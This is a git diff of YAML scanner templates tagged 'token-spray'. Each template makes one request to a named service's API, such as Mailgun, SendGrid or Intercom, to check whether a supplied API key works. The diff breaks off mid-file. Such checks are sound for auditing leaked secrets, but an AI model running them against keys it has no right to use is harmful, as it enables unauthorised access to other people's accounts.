4a0a004730450220146bd47f0c375401f1e505bb59c118fb400158865929ccc4a0a1e3e998bb6c8c022100931ce1826228f7c66289078fc9eaeda2ef2c5d0491318933400ca518e9073b89:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-instatus-442.yaml b/poc/api/api-instatus-442.yaml deleted file mode 100644 index dfd968d1b3..0000000000 --- a/poc/api/api-instatus-442.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: api-instatus - -info: - name: Instatus API Test - author: daffainfo - severity: info - description: Post to and update maintenance and incidents on your status page through an HTTP REST API - reference: - - https://instatus.com/help/api - - https://github.com/daffainfo/all-about-apikey/tree/main/instatus - metadata: - max-request: 1 - tags: token-spray,instatus - -self-contained: true - -http: - - method: GET - path: - - "https://api.instatus.com/v1/pages" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"id":' - - '"subdomain":' - - '"name":' - - '"logoUrl":' - condition: and - -# digest: 4a0a00473045022100850e53c92a054ffcf08500f345965b5674f65e8974a2d82117d4c127f613fcff02207fa1e6c159c8c013d78f0137271ff8bcba2204413bd77bb35fa6a1d25dc7c4d0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-instatus.yaml b/poc/api/api-instatus.yaml new file mode 100644 index 0000000000..1175f1b8b3 --- /dev/null +++ b/poc/api/api-instatus.yaml @@ -0,0 +1,29 @@ +id: api-instatus + +info: + name: Instatus API Test + author: daffainfo + severity: info + description: Post to and update maintenance and incidents on your status page through an HTTP REST API + reference: + - https://instatus.com/help/api + - https://github.com/daffainfo/all-about-apikey/tree/main/instatus + tags: token-spray,instatus + +self-contained: true +requests: + - method: GET + path: + - "https://api.instatus.com/v1/pages" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"id":' + - '"subdomain":' + - '"name":' + - '"logoUrl":' + condition: and diff --git a/poc/api/api-intercom-443.yaml b/poc/api/api-intercom-443.yaml new file mode 100644 index 0000000000..4ae7ce807b --- /dev/null +++ b/poc/api/api-intercom-443.yaml @@ -0,0 +1,30 @@ +id: api-intercom + +info: + name: Intercom API Test + author: dwisiswant0 + severity: info + reference: + - https://developers.intercom.com/building-apps/docs/rest-api-reference + metadata: + max-request: 1 + tags: token-spray,intercom + +self-contained: true + +http: + - method: GET + path: + - "https://api.intercom.io/users" + + headers: + Authorization: Bearer {{token}} + Accept: application/json + matchers: + - type: word + part: body + words: + - "Access Token Invalid" + negative: true + +# digest: 4b0a00483046022100961f1591bb9414b8304809c1253739861d2e47d3555bf7caaf47cb719aec2ad602210082a496a018342802274a471a3bfd500c4e82ac6eefe13a1efc643e102609fcbc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-intercom.yaml b/poc/api/api-intercom.yaml deleted file mode 100644 index 5c0dc15191..0000000000 --- a/poc/api/api-intercom.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-intercom - -info: - name: Intercom API Test - author: dwisiswant0 - reference: https://developers.intercom.com/building-apps/docs/rest-api-reference - severity: info - tags: token-spray,intercom - -self-contained: true -requests: - - method: GET - path: - - "https://api.intercom.io/users" - headers: - Authorization: Bearer {{token}} - Accept: application/json - - matchers: - - type: word - part: body - words: - - "Access Token Invalid" - negative: true diff --git a/poc/api/api-ipstack.yaml b/poc/api/api-ipstack-444.yaml similarity index 100% rename from poc/api/api-ipstack.yaml rename to poc/api/api-ipstack-444.yaml diff --git a/poc/api/api-iterable-445.yaml b/poc/api/api-iterable-445.yaml new file mode 100644 index 0000000000..0c1f84d566 --- /dev/null +++ b/poc/api/api-iterable-445.yaml @@ -0,0 +1,23 @@ +id: api-iterable + +info: + name: Iterable API Test + author: zzeitlin + reference: https://api.iterable.com/api/docs + severity: info + tags: token-spray,iterable + +requests: + - method: GET + path: + - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" + headers: + Api_Key: "{{token}}" + + matchers: + - type: word + part: body + negative: true + words: + - 'BadApiKey' + - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve diff --git a/poc/api/api-iterable.yaml b/poc/api/api-iterable.yaml deleted file mode 100644 index b559444b8f..0000000000 --- a/poc/api/api-iterable.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-iterable - -info: - name: Iterable API Test - author: zzeitlin - severity: info - reference: https://api.iterable.com/api/docs - tags: token-spray,iterable - -self-contained: true -requests: - - method: GET - path: - - "https://api.iterable.com/api/catalogs" - headers: - Api_Key: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"name":' - - '"catalogNames":' - condition: and diff --git a/poc/api/api-jumpcloud.yaml b/poc/api/api-jumpcloud-446.yaml similarity index 100% rename from poc/api/api-jumpcloud.yaml rename to poc/api/api-jumpcloud-446.yaml diff --git a/poc/api/api-linkfinder.yaml b/poc/api/api-linkfinder.yaml index 38c579ea74..719a8c37dc 100644 --- a/poc/api/api-linkfinder.yaml +++ b/poc/api/api-linkfinder.yaml @@ -19,4 +19,4 @@ requests: - type: regex name: relative_links regex: - - ([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}(?:[a-zA-Z]{1,4}|action)(?:[\?|#][^"|']{0,}|)) + - ([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}(?:[a-zA-Z]{1,4}|action)(?:[\?|#][^"|']{0,}|)) \ No newline at end of file diff --git a/poc/api/api-lokalise-452.yaml b/poc/api/api-lokalise.yaml similarity index 100% rename from poc/api/api-lokalise-452.yaml rename to poc/api/api-lokalise.yaml diff --git a/poc/api/api-mailchimp-454.yaml b/poc/api/api-mailchimp-454.yaml deleted file mode 100644 index 5232ddda97..0000000000 --- a/poc/api/api-mailchimp-454.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-mailchimp - -info: - name: Mailchimp API Test - author: zzeitlin - severity: info - reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration - tags: token-spray,mailchimp - -self-contained: true -network: - - inputs: - - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" - read: 1024 - host: - - "tls://smtp.mandrillapp.com:465" - - matchers: - - type: word - words: - - "success" diff --git a/poc/api/api-mailchimp.yaml b/poc/api/api-mailchimp.yaml index 9d7073e46c..5232ddda97 100644 --- a/poc/api/api-mailchimp.yaml +++ b/poc/api/api-mailchimp.yaml @@ -3,10 +3,11 @@ id: api-mailchimp info: name: Mailchimp API Test author: zzeitlin - reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration severity: info + reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration tags: token-spray,mailchimp +self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" diff --git a/poc/api/api-mailgun-455.yaml b/poc/api/api-mailgun-455.yaml index ac24bdb9b4..dfa06bdfaa 100644 --- a/poc/api/api-mailgun-455.yaml +++ b/poc/api/api-mailgun-455.yaml @@ -4,23 +4,17 @@ info: name: Mailgun API Test author: zzeitlin severity: info - description: Email Service - reference: - - https://documentation.mailgun.com/en/latest/api-intro.html - - https://github.com/daffainfo/all-about-apikey/tree/main/mailgun - metadata: - max-request: 1 + reference: https://documentation.mailgun.com/en/latest/api-intro.html tags: token-spray,mailgun self-contained: true - -http: +requests: - method: GET path: - "https://api.mailgun.net/v3/domains" - headers: Authorization: Basic {{base64('api:' + token)}} + matchers: - type: word part: body @@ -29,5 +23,3 @@ http: - '"items":' - '"created_at":' condition: and - -# digest: 490a00463044022017959a95e024fcff4806de7f1fdb66380733e2cbd2d6769373fe14805ba0525902206f514f2f93928486eb249ff9b41d2f9ab0583e9f54a55b0d804cf31a9f0e61e5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-malshare-456.yaml b/poc/api/api-malshare-456.yaml index d486f6f0fd..b1108b4e33 100644 --- a/poc/api/api-malshare-456.yaml +++ b/poc/api/api-malshare-456.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://malshare.com/doc.php - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md tags: token-spray,malshare self-contained: true diff --git a/poc/api/api-malshare.yaml b/poc/api/api-malshare.yaml new file mode 100644 index 0000000000..d486f6f0fd --- /dev/null +++ b/poc/api/api-malshare.yaml @@ -0,0 +1,24 @@ +id: api-malshare + +info: + name: MalShare API Test + author: daffainfo + severity: info + reference: + - https://malshare.com/doc.php + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md + tags: token-spray,malshare + +self-contained: true +requests: + - method: GET + path: + - "https://api.malshare.com/api.php?api_key={{token}}&action=getlist" + + matchers: + - type: word + part: body + words: + - '"md5":' + - '"sha1":' + condition: and diff --git a/poc/api/api-malwarebazaar-458.yaml b/poc/api/api-malwarebazaar-458.yaml deleted file mode 100644 index ce99bd0a43..0000000000 --- a/poc/api/api-malwarebazaar-458.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: api-malwarebazaar - -info: - name: MalwareBazaar API Test - author: daffainfo - severity: info - reference: - - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md - tags: token-spray,malwarebazaar - -self-contained: true -requests: - - raw: - - | - POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 - Host: mb-api.abuse.ch - API-KEY: {{token}} - Content-Length: 0 - Content-Type: multipart/form-data; boundary=545d0ca717a743c3bd4fa575585f74c6 - - --545d0ca717a743c3bd4fa575585f74c6 - Content-Disposition: form-data; name="json_data" - Content-Type: application/json - - {"tags": ["exe", "test"], "references": {"twitter": ["https://twitter.com/abuse_ch/status/1224269018506330112"], "malpedia": ["https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"], "joe_sandbox": ["https://www.joesecurity.org/reports/1", "https://www.joesecurity.org/reports/2"], "links": ["https://urlhaus.abuse.ch/url/306613/"], "any_run": ["https://app.any.run/tasks/1", "https://app.any.run/tasks/2"]}, "context": {"comment": "this malware sample is very nasty!", "dropped_by_md5": ["68b329da9893e34099c7d8ad5cb9c940"], "dropped_by_malware": ["Gozi"], "dropped_by_sha256": ["01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", "4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865"]}, "anonymous": 1, "delivery_method": "email_attachment"} - --545d0ca717a743c3bd4fa575585f74c6 - Content-Disposition: form-data; name="file"; filename="1.txt" - - dssd - - --545d0ca717a743c3bd4fa575585f74c6-- - - matchers: - - type: word - part: body - words: - - '"query_status": "inserted"' - - '"query_status": "file_already_known"' - condition: or diff --git a/poc/api/api-malwarebazaar-459.yaml b/poc/api/api-malwarebazaar-459.yaml index 4a424faa68..f261796b92 100644 --- a/poc/api/api-malwarebazaar-459.yaml +++ b/poc/api/api-malwarebazaar-459.yaml @@ -4,17 +4,13 @@ info: name: MalwareBazaar API Test author: daffainfo severity: info - description: Collect and share malware samples reference: - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/tree/main/malwarebazaar - metadata: - max-request: 1 - tags: token-spray,malwarebazaar,intrusive + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalwareBazaar.md + tags: token-spray,malwarebazaar self-contained: true - -http: +requests: - raw: - | POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 @@ -42,5 +38,3 @@ http: - '"query_status": "inserted"' - '"query_status": "file_already_known"' condition: or - -# digest: 4b0a00483046022100f5d19c2f0a4b8aaf9f21dd936fba07954a82d880f3c014db4faba4fb2a535538022100bf2a275e923f4190c5b7d398ac019329cdb75af155007fe5b6822fc577741533:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-mapbox-465.yaml b/poc/api/api-mapbox-465.yaml index 4ed5e0648f..9a4ef36abe 100644 --- a/poc/api/api-mapbox-465.yaml +++ b/poc/api/api-mapbox-465.yaml @@ -3,12 +3,16 @@ id: api-mapbox info: name: Mapbox API Test author: zzeitlin - reference: https://docs.mapbox.com/api/search/geocoding/ severity: info + reference: + - https://docs.mapbox.com/api/search/geocoding/ + metadata: + max-request: 1 tags: token-spray,mapbox self-contained: true -requests: + +http: - method: GET path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" @@ -21,3 +25,5 @@ requests: - 'query' - 'features' condition: and + +# digest: 4a0a004730450220768d1ff5878050798d8823910a7a94b878f6dea320f1ddbed4d39300607ddc8b022100924963d6e43ad9e9ea39b44ecede601bf33126849ebd4e4c63b46f6479614d08:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-mapbox.yaml b/poc/api/api-mapbox.yaml deleted file mode 100644 index c4640d9695..0000000000 --- a/poc/api/api-mapbox.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-mapbox - -info: - name: Mapbox API Test - author: zzeitlin - reference: https://docs.mapbox.com/api/search/geocoding/ - severity: info - tags: token-spray,mapbox - -requests: - - method: GET - path: - - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" - - matchers: - - type: status - status: - - 401 - negative: true diff --git a/poc/api/api-mojoauth-466.yaml b/poc/api/api-mojoauth-466.yaml deleted file mode 100644 index 85c9820f23..0000000000 --- a/poc/api/api-mojoauth-466.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-mojoauth - -info: - name: MojoAuth API Test - author: daffainfo - severity: info - description: Secure and modern passwordless authentication platform - reference: - - https://mojoauth.com/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth - metadata: - max-request: 1 - tags: token-spray,mojoauth - -self-contained: true - -http: - - raw: - - | - POST https://api.mojoauth.com/token/jwks HTTP/1.1 - Host: api.mojoauth.com - X-API-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"keys"' - - '"kty"' - - '"kid"' - condition: and - -# digest: 4a0a0047304502200506d39f1578c027a21bc88f89e4c08aeb679ca01db946d0b2bfb56e7d8c615d022100b6123ee1887fe67d62e526c14ad9b4bd755d1727085a16877bbb8b59651f33ba:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-mojoauth.yaml b/poc/api/api-mojoauth.yaml new file mode 100644 index 0000000000..db56c9a9bc --- /dev/null +++ b/poc/api/api-mojoauth.yaml @@ -0,0 +1,28 @@ +id: api-mojoauth + +info: + name: MojoAuth API Test + author: daffainfo + severity: info + description: Secure and modern passwordless authentication platform + reference: + - https://mojoauth.com/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth + tags: token-spray,mojoauth + +self-contained: true +requests: + - raw: + - | + POST https://api.mojoauth.com/token/jwks HTTP/1.1 + Host: api.mojoauth.com + X-API-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"keys"' + - '"kty"' + - '"kid"' + condition: and diff --git a/poc/api/api-mywot-467.yaml b/poc/api/api-mywot-467.yaml index 6f1f3daaf1..2440afe842 100644 --- a/poc/api/api-mywot-467.yaml +++ b/poc/api/api-mywot-467.yaml @@ -4,17 +4,13 @@ info: name: My Web of Trust API author: daffainfo severity: info - description: IP/domain/URL reputation reference: - https://support.mywot.com/hc/en-us/sections/360004477734-API- - - https://github.com/daffainfo/all-about-apikey/tree/main/web-of-trust - metadata: - max-request: 1 + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Web%20of%20Trust.md tags: token-spray,weboftrust self-contained: true - -http: +requests: - raw: - | GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 @@ -29,5 +25,3 @@ http: - '"target":' - '"safety":' condition: and - -# digest: 490a00463044022050822dedbfa563ddf5000add7b851539b264a5b3a2b59a8669ea936e869c9b4802207ada282ba59cbc6034abd040b87aca4b296b655d7de41e31af8297ebae4bf2f9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-mywot-468.yaml b/poc/api/api-mywot-468.yaml deleted file mode 100644 index 7256c5d9e8..0000000000 --- a/poc/api/api-mywot-468.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-mywot - -info: - name: My Web of Trust API - author: daffainfo - severity: info - reference: - - https://support.mywot.com/hc/en-us/sections/360004477734-API- - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Web%20of%20Trust.md - tags: token-spray,weboftrust - -self-contained: true -requests: - - raw: - - | - GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 - Host: scorecard.api.mywot.com - x-user-id: {{id}} - x-api-key: {{token}} - - matchers: - - type: word - part: body - words: - - '"target":' - - '"safety":' - condition: and diff --git a/poc/api/api-netlify-470.yaml b/poc/api/api-netlify-470.yaml deleted file mode 100644 index fd4aacbc89..0000000000 --- a/poc/api/api-netlify-470.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-netlify - -info: - name: Netlify API Test - author: dwisiswant0 - severity: info - reference: - - https://docs.netlify.com/api/get-started/ - metadata: - max-request: 1 - tags: token-spray,netlify - -self-contained: true - -http: - - method: GET - path: - - "https://api.netlify.com/api/v1/sites" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"id":' - - '"premium":' - - '"claimed":' - condition: and - -# digest: 4a0a0047304502207e42d56f08b8711aa9e2dc68c1f03484bcbffd91ca75cb894339fcf576a0f8b3022100b30d2ae584362d29f0e05772a69ed14161d80a266266ac43269a1be95e9eb013:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-netlify.yaml b/poc/api/api-netlify.yaml new file mode 100644 index 0000000000..e57127c9f5 --- /dev/null +++ b/poc/api/api-netlify.yaml @@ -0,0 +1,25 @@ +id: api-netlify + +info: + name: Netlify API Test + author: dwisiswant0 + severity: info + reference: https://docs.netlify.com/api/get-started/ + tags: token-spray,netlify + +self-contained: true +requests: + - method: GET + path: + - "https://api.netlify.com/api/v1/sites" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"id":' + - '"premium":' + - '"claimed":' + condition: and diff --git a/poc/api/api-openweather-473.yaml b/poc/api/api-openweather-473.yaml index 13a26aecc3..1a9a5058e3 100644 --- a/poc/api/api-openweather-473.yaml +++ b/poc/api/api-openweather-473.yaml @@ -3,21 +3,16 @@ id: api-openweather info: name: OpenWeather API Test author: zzeitlin - severity: info reference: https://openweathermap.org/current + severity: info tags: token-spray,weather,openweather -self-contained: true requests: - method: GET path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" matchers: - - type: word - part: body - words: - - '"coord":' - - '"weather":' - - '"base":' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-openweather.yaml b/poc/api/api-openweather.yaml deleted file mode 100644 index 1a9a5058e3..0000000000 --- a/poc/api/api-openweather.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: api-openweather - -info: - name: OpenWeather API Test - author: zzeitlin - reference: https://openweathermap.org/current - severity: info - tags: token-spray,weather,openweather - -requests: - - method: GET - path: - - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" - - matchers: - - type: status - status: - - 200 diff --git a/poc/api/api-pagerduty.yaml b/poc/api/api-pagerduty-475.yaml similarity index 100% rename from poc/api/api-pagerduty.yaml rename to poc/api/api-pagerduty-475.yaml diff --git a/poc/api/api-pendo.yaml b/poc/api/api-pendo.yaml new file mode 100644 index 0000000000..8ea141bcc0 --- /dev/null +++ b/poc/api/api-pendo.yaml @@ -0,0 +1,23 @@ +id: api-pendo + +info: + name: Pendo API Test + author: zzeitlin + reference: https://help.pendo.io/resources/support-library/api/index.html + severity: info + tags: token-spray,pendo + +requests: + - method: GET + path: + - "https://app.pendo.io/api/v1/feature" + - "https://app.pendo.io/api/v1/metadata/schema/account" + headers: + Content-Type: application/json + X-Pendo-Integration-Key: "{{token}}" + + matchers: + - type: status + status: + - 403 + negative: true \ No newline at end of file diff --git a/poc/api/api-petfinder-480.yaml b/poc/api/api-petfinder-480.yaml new file mode 100644 index 0000000000..7067e2d97a --- /dev/null +++ b/poc/api/api-petfinder-480.yaml @@ -0,0 +1,36 @@ +id: api-petfinder + +info: + name: Petfinder API Test + author: daffainfo + severity: info + description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted + reference: + - https://www.petfinder.com/developers/v2/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder + metadata: + max-request: 1 + tags: token-spray,petfinder + +self-contained: true + +http: + - raw: + - | + POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 + Host: api.petfinder.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} + + matchers: + - type: word + part: body + words: + - '"token_type"' + - '"expires_in"' + - '"access_token"' + condition: and + +# digest: 490a0046304402205df678454684e798c9f3bfe4c88e7b86a5fe36217b85109635c57b13df65cbc702202539e9116f2321678f5c72b1f510e253761d1e1c425ee6cd15fcdc3bac2f77e5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-petfinder.yaml b/poc/api/api-petfinder.yaml deleted file mode 100644 index ae0b6866a1..0000000000 --- a/poc/api/api-petfinder.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-petfinder - -info: - name: Petfinder API Test - author: daffainfo - severity: info - description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted - reference: - - https://www.petfinder.com/developers/v2/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder - tags: token-spray,petfinder - -self-contained: true -requests: - - raw: - - | - POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 - Host: api.petfinder.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} - - matchers: - - type: word - part: body - words: - - '"token_type"' - - '"expires_in"' - - '"access_token"' - condition: and diff --git a/poc/api/api-pivotaltracker.yaml b/poc/api/api-pivotaltracker-482.yaml similarity index 100% rename from poc/api/api-pivotaltracker.yaml rename to poc/api/api-pivotaltracker-482.yaml diff --git a/poc/api/api-postmark-483.yaml b/poc/api/api-postmark-483.yaml deleted file mode 100644 index b9bec134db..0000000000 --- a/poc/api/api-postmark-483.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-postmark - -info: - name: PostMark API Test - author: zzeitlin - severity: info - reference: https://postmarkapp.com/developer/api/overview - tags: token-spray,postmark - -self-contained: true -requests: - - method: GET - path: - - "https://api.postmarkapp.com/server" - headers: - Accept: application/json - X-Postmark-Server-Token: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"ID":' - - '"Name":' - - '"ApiTokens":' - condition: and diff --git a/poc/api/api-postmark.yaml b/poc/api/api-postmark.yaml index 5b5aead0dc..b9bec134db 100644 --- a/poc/api/api-postmark.yaml +++ b/poc/api/api-postmark.yaml @@ -3,19 +3,24 @@ id: api-postmark info: name: PostMark API Test author: zzeitlin - reference: https://postmarkapp.com/developer/api/overview severity: info + reference: https://postmarkapp.com/developer/api/overview tags: token-spray,postmark +self-contained: true requests: - method: GET path: - - "https://api.postmarkapp.com/stats/outbound" + - "https://api.postmarkapp.com/server" headers: Accept: application/json X-Postmark-Server-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"ID":' + - '"Name":' + - '"ApiTokens":' + condition: and diff --git a/poc/api/api-rijksmuseum.yaml b/poc/api/api-rijksmuseum.yaml deleted file mode 100644 index 11327595a7..0000000000 --- a/poc/api/api-rijksmuseum.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-rijksmuseum - -info: - name: Rijksmuseum API Test - author: daffainfo - severity: info - reference: - - https://data.rijksmuseum.nl/user-generated-content/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Rijksmuseum.md - tags: token-spray,rijksmuseum - -self-contained: true -requests: - - method: GET - path: - - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" - - matchers: - - type: word - part: body - words: - - '"count":' - - '"userSets":' - - '"user":' - condition: and diff --git a/poc/api/api-scanii-487.yaml b/poc/api/api-scanii-487.yaml index 9c9b50f9e0..237f5e82dd 100644 --- a/poc/api/api-scanii-487.yaml +++ b/poc/api/api-scanii-487.yaml @@ -4,13 +4,17 @@ info: name: Scanii API Test author: daffainfo severity: info + description: Simple REST API that can scan submitted documents/files for the presence of threats reference: - https://docs.scanii.com/v2.1/resources.html - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Scanii.md + - https://github.com/daffainfo/all-about-apikey/tree/main/scanii + metadata: + max-request: 1 tags: token-spray,scanii self-contained: true -requests: + +http: - raw: - | GET https://api.scanii.com/v2.1/ping HTTP/1.1 @@ -24,3 +28,5 @@ requests: - '"key"' - '"message" : "pong"' condition: and + +# digest: 4a0a00473045022078f825c2797fe08f026fddaa434bd3b1841c0692a1bf603fd611ea755c3dd2c9022100b3a0b85cdd13e42a0cfd47d5cce8339db6615475a64ad404ab873801fd4874a8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-scanii-488.yaml b/poc/api/api-scanii-488.yaml new file mode 100644 index 0000000000..9c9b50f9e0 --- /dev/null +++ b/poc/api/api-scanii-488.yaml @@ -0,0 +1,26 @@ +id: api-scanii + +info: + name: Scanii API Test + author: daffainfo + severity: info + reference: + - https://docs.scanii.com/v2.1/resources.html + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Scanii.md + tags: token-spray,scanii + +self-contained: true +requests: + - raw: + - | + GET https://api.scanii.com/v2.1/ping HTTP/1.1 + Authorization: Basic {{base64(api + ':' + secret)}} + Host: api.scanii.com + + matchers: + - type: word + part: body + words: + - '"key"' + - '"message" : "pong"' + condition: and diff --git a/poc/api/api-sendgrid-489.yaml b/poc/api/api-sendgrid-489.yaml deleted file mode 100644 index 3c24d1dfaf..0000000000 --- a/poc/api/api-sendgrid-489.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-sendgrid - -info: - name: Sendgrid API Test - author: zzeitlin - severity: info - reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp - tags: token-spray,sendgrid - -self-contained: true -network: - - inputs: - - data: "ehlo\r\n" - read: 1024 - - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" - read: 1024 - host: - - "tls://smtp.sendgrid.net:465" - - matchers: - - type: word - words: - - "Authentication successful" diff --git a/poc/api/api-sendgrid.yaml b/poc/api/api-sendgrid.yaml index 3bf3692649..3c24d1dfaf 100644 --- a/poc/api/api-sendgrid.yaml +++ b/poc/api/api-sendgrid.yaml @@ -4,25 +4,20 @@ info: name: Sendgrid API Test author: zzeitlin severity: info - reference: - - https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp - metadata: - max-request: 1 + reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp tags: token-spray,sendgrid self-contained: true -tcp: +network: - inputs: - data: "ehlo\r\n" read: 1024 - - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" read: 1024 host: - "tls://smtp.sendgrid.net:465" + matchers: - type: word words: - "Authentication successful" - -# digest: 4b0a004830460221008e0e74cc516e39557ab0c6778b54c5057b78391e494874ccb1cb0affe9888d67022100892b564dc499c64d59217eb15a6fdecdf2c0b5873366ee7093b857e2a2b43e92:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-slack-493.yaml b/poc/api/api-slack.yaml similarity index 100% rename from poc/api/api-slack-493.yaml rename to poc/api/api-slack.yaml diff --git a/poc/api/api-sonarcloud-494.yaml b/poc/api/api-sonarcloud-494.yaml index fdf0dc6724..97831db0bd 100644 --- a/poc/api/api-sonarcloud-494.yaml +++ b/poc/api/api-sonarcloud-494.yaml @@ -3,10 +3,11 @@ id: api-sonarcloud info: name: SonarCloud API Test author: zzeitlin - reference: https://sonarcloud.io/web_api/api/authentication severity: info + reference: https://sonarcloud.io/web_api/api/authentication tags: token-spray,sonarcloud +self-contained: true requests: - method: GET path: @@ -18,4 +19,4 @@ requests: - type: word part: body words: - - 'true' + - '{"valid": true}' diff --git a/poc/api/api-sonarcloud.yaml b/poc/api/api-sonarcloud.yaml new file mode 100644 index 0000000000..fdf0dc6724 --- /dev/null +++ b/poc/api/api-sonarcloud.yaml @@ -0,0 +1,21 @@ +id: api-sonarcloud + +info: + name: SonarCloud API Test + author: zzeitlin + reference: https://sonarcloud.io/web_api/api/authentication + severity: info + tags: token-spray,sonarcloud + +requests: + - method: GET + path: + - "https://sonarcloud.io/api/authentication/validate" + headers: + Authorization: Basic {{base64(token + ':')}} + + matchers: + - type: word + part: body + words: + - 'true' diff --git a/poc/api/api-spotify-495.yaml b/poc/api/api-spotify-495.yaml deleted file mode 100644 index 0f3cbc620d..0000000000 --- a/poc/api/api-spotify-495.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-spotify - -info: - name: Spotify API Test - author: zzeitlin - severity: info - reference: - - https://developer.spotify.com/documentation/general/guides/authorization-guide/ - metadata: - max-request: 1 - tags: token-spray,spotify - -self-contained: true - -http: - - method: GET - path: - - "https://api.spotify.com/v1/me/player/devices" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"devices":' - - '"id":' - - '"is_active":' - condition: and - -# digest: 4a0a00473045022100bfa9c51c453212bb217cccd26bd38e3a08368404e2fd3bd84800c76f4f3c0b8302207b37fcf4fb39b559417a5abc293f8a654383e066302f942d53e186707a6572dc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-spotify.yaml b/poc/api/api-spotify.yaml new file mode 100644 index 